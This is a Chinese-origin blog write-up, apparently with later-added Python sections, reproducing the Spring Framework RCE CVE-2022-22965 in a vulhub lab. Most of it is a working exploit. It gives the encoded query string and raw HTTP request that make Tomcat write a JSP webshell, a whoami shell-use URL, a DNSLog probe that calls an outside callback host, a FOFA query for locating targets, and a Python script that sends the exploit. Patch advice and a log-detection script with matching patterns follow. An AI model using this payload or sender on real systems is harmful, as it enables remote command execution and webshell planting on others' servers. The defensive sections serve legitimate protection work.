
CVE-2022-22965 Spring Framework Remote Code Execution Vulnerability Reproduction

0x00-Introduction


My thesis has been giving me a headache lately.

0x01-Environment Setup


Target: CentOS Linux 7

Attacker: Windows Server 2016 and Kali

Environment: vulhub

Project: https://github.com/vulhub/vulhub

To set up vulhub, see: Setting up vulhub on a blank 64-bit CentOS 7 (detailed)

0x02-Vulnerability Description and Analysis


The vulnerability allows an attacker to write a webshell and execute commands. When Spring Framework runs on JDK 9 or later, a remote attacker who meets the conditions below can walk the framework's parameter binding (a getter chain that starts at class.module.classLoader) down to Tomcat's AccessLogValve object, set malicious field values on it, and have the valve write a file with attacker-controlled content to an arbitrary path through the pipeline mechanism. JDK 9 matters because java.lang.Class gained getModule() and Module exposes getClassLoader(); that route sidesteps the class.classLoader check Spring added after CVE-2010-1622, which is why the old class-loader trick works again.

Exploitation conditions:

JDK version >= 9
A request parameter is bound to an object (POJO); binding to simple types is not affected
The application runs on Apache Tomcat and is deployed as a WAR (the public exploit does not work against an executable jar with embedded Tomcat)

Affected versions:

Spring Framework 5.3.X < 5.3.18
Spring Framework 5.2.X < 5.2.20
running on JDK >= 9

DNSLog callback probe (confirms the binding chain is reachable without writing any file: the server fetches the configFile URL, and the DNS lookup shows up in DNSLog):

?class.module.classLoader.resources.context.configFile=http://spring-jayway.i1y1tg.dnslog.cn/test&class.module.classLoader.resources.context.configFile.content.aaa=xxx

FOFA query

app="vmware-SpringBoot-Framework"

0x03-Vulnerability Reproduction


01-Manual reproduction

Core of the PoC (query string)

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

Open the target

Enter the PoC in HackBar and capture the request with a proxy

Modify the captured request to the following. The extra suffix, c1 and c2 headers supply the "%>//", "Runtime" and "<%" pieces that the pattern references as %{suffix}i, %{c1}i and %{c2}i, so no literal "<%" or bare "%" has to appear in the query string (a bare "%" would be parsed by the valve as a log directive).

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.234.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 0

Visit http://192.168.234.128:8080/tomcatwar.jsp?pwd=j&cmd=whoami; if the file was written, the output of whoami is returned.
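The following is an added example, not code from the original post or from vulhub. It shows what the PoC query string above and the DNSLog probe from the description section actually do once they reach Tomcat: Spring binds each class.module.classLoader.resources.context.parent.pipeline.first.* parameter onto the AccessLogValve, and the valve expands %{name}i in its pattern to the value of request header "name". The host and port in send_exploit() are assumptions for illustration; everything else is derived from the PoC on this page.

```python
"""Added example: reconstruct the file the PoC makes Tomcat's AccessLogValve write,
and build the exploit / probe query strings. Not code from the original post."""
import http.client
import re
from urllib.parse import parse_qs, quote, unquote, urlencode

# URL-encoded AccessLogValve pattern, copied verbatim from the PoC above.
PATTERN_ENCODED = (
    "%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20"
    "java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec("
    "request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B"
    "%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))"
    "!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di"
)

# Binding path from the PoC: Tomcat WebappClassLoader -> resources -> StandardContext
# -> parent pipeline -> first valve (the AccessLogValve).
VALVE = "class.module.classLoader.resources.context.parent.pipeline.first."

# Request headers the valve substitutes for %{c2}i, %{c1}i and %{suffix}i. They carry
# '<%', 'Runtime' and '%>//' because a raw '%' inside the pattern would itself be parsed
# as a log directive, and '<%' in a URL is an easy WAF hit.
HEADERS = {"suffix": "%>//", "c1": "Runtime", "c2": "<%"}

_HEADER_DIRECTIVE = re.compile(r"%\{([^}]*)\}i")


def expand_valve_pattern(pattern: str, headers: dict) -> str:
    """Mimic AccessLogValve's %{name}i element: header value, or '-' when absent."""
    return _HEADER_DIRECTIVE.sub(lambda m: headers.get(m.group(1), "-"), pattern)


def rendered_jsp() -> str:
    """Content the valve appends to webapps/ROOT/tomcatwar.jsp for the logged request."""
    return expand_valve_pattern(unquote(PATTERN_ENCODED), HEADERS)


def build_exploit_query(directory="webapps/ROOT", prefix="tomcatwar", suffix=".jsp") -> str:
    """The five AccessLogValve properties the PoC binds. fileDateFormat is emptied so the
    file name is exactly prefix + suffix instead of prefix.YYYY-MM-DD.suffix."""
    params = {
        VALVE + "pattern": unquote(PATTERN_ENCODED),
        VALVE + "suffix": suffix,
        VALVE + "directory": directory,  # relative to catalina.base
        VALVE + "prefix": prefix,
        VALVE + "fileDateFormat": "",
    }
    return urlencode(params, quote_via=quote)


def build_probe_query(callback_host: str) -> str:
    """Non-destructive check from the DNSLog section: binding a URL onto context.configFile
    and then touching .content makes the server resolve callback_host."""
    base = "class.module.classLoader.resources.context.configFile"
    return urlencode({base: f"http://{callback_host}/test", base + ".content.aaa": "xxx"},
                     quote_via=quote)


def bound_fields(query: str) -> dict:
    """Decoded name -> value pairs, i.e. the property paths Spring's WebDataBinder walks."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def send_exploit(host="192.168.234.128", port=8080, timeout=10) -> int:
    """Send the request from the write-up against a live lab target (host/port are an
    assumption). Returns the HTTP status; the valve logs the request whatever the status."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("GET", "/?" + build_exploit_query(), headers=HEADERS)
    status = conn.getresponse().status
    conn.close()
    return status


if __name__ == "__main__":
    print(rendered_jsp())
    print(build_probe_query("spring-jayway.i1y1tg.dnslog.cn"))
```

The rendered JSP is a plain password-gated command runner: it starts with "<%", calls Runtime.getRuntime().exec() on the cmd parameter, and ends with "%>//", where the trailing "//" comments out whatever else the valve appends after the pattern on the same log line.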

02-Writing with a tool

https://github.com/crow821/crowsec/tree/master/Spring_RCE_CVE-2022-22965

0x05-Defense


Upgrade Spring Framework to 5.3.18 or 5.2.20 (Spring Boot 2.6.6 and 2.5.12 pull these in). If you cannot upgrade right away, Apache Tomcat 10.0.20, 9.0.62 and 8.5.78 close the class-loader path this exploit walks, and the Spring advisory's workaround is a @ControllerAdvice with an @InitBinder that calls setDisallowedFields("class.*", "Class.*", "*.class.*", "*.Class.*") on the WebDataBinder; note that a controller with its own @InitBinder setting disallowed fields overrides that global list. Running on JDK 8 only removes the Module.getClassLoader() route and is not a fix.
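For the detection side of the defense, here is an added example (not from the original post) that flags this exploit's footprints in a Tomcat access log. The log lines are constructed for the example in Tomcat's "common" format; the request-line field is what that format records, and the matching is case-insensitive for the same reason Spring's disallowed-field list covers both "class.*" and "Class.*".

```python
"""Added example: classify Tomcat access-log lines for CVE-2022-22965 activity.
Sample log lines are constructed, not captured from a real incident."""
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample in Tomcat "common" format: %h %l %u %t "%r" %s %b
SAMPLE_LOG = """\
192.168.234.1 - - [07/Apr/2022:21:23:23 +0800] "GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" 200 45
192.168.234.1 - - [07/Apr/2022:21:23:31 +0800] "GET /?class.module.classLoader.resources.context.configFile=http://x.dnslog.example/test&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 400 0
192.168.234.1 - - [07/Apr/2022:21:24:34 +0800] "GET /tomcatwar.jsp?pwd=j&cmd=whoami HTTP/1.1" 200 6
10.0.0.5 - - [07/Apr/2022:21:25:00 +0800] "GET /?name=alice&age=30 HTTP/1.1" 200 1024
10.0.0.7 - - [07/Apr/2022:21:25:10 +0800] "GET /?Class.Module.ClassLoader.Resources.context.parent.pipeline.first.prefix=x HTTP/1.1" 200 45
"""

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# The getter chain itself (JDK 9+ route and the pre-CVE-2010-1622 route), anchored so
# that it has to start a parameter name or a nested property.
BINDING_CHAIN = re.compile(r"(^|[?&.])(class\.module\.classLoader|class\.classLoader)\.", re.I)
# AccessLogValve properties the write-up's PoC sets.
VALVE_FIELDS = re.compile(r"\.pipeline\.first\.(pattern|suffix|prefix|directory|fileDateFormat)=", re.I)
# The DNSLog probe from the description section.
PROBE = re.compile(r"\.resources\.context\.configFile", re.I)
# Follow-up use of a dropped JSP shell taking a command parameter.
WEBSHELL_USE = re.compile(r"\.jsp\?.*\bcmd=", re.I)


def classify(line: str) -> Optional[str]:
    """Return a verdict for one access-log line, or None when nothing matches."""
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    # Decode twice so a double-encoded chain still matches.
    target = unquote(unquote(m.group("target")))
    if BINDING_CHAIN.search(target) and VALVE_FIELDS.search(target):
        return "spring4shell-write"
    if BINDING_CHAIN.search(target) and PROBE.search(target):
        return "spring4shell-probe"
    if BINDING_CHAIN.search(target):
        return "classloader-binding"
    if WEBSHELL_USE.search(target):
        return "possible-webshell-use"
    return None


def scan(log_text: str) -> list:
    """(line number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits


if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

This works for the write-up's reproduction because the parameters travel in the query string of a GET. The same parameters in a POST body are bound just as well by Spring but never appear in the access log, so pair this with WAF or request-body logging rather than relying on it alone.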

0x06-References


https://mp.weixin.qq.com/s/NYYOYvfnr0RbBbrlS0tlVA

Posted 2022-04-12 19:04 by 美式加糖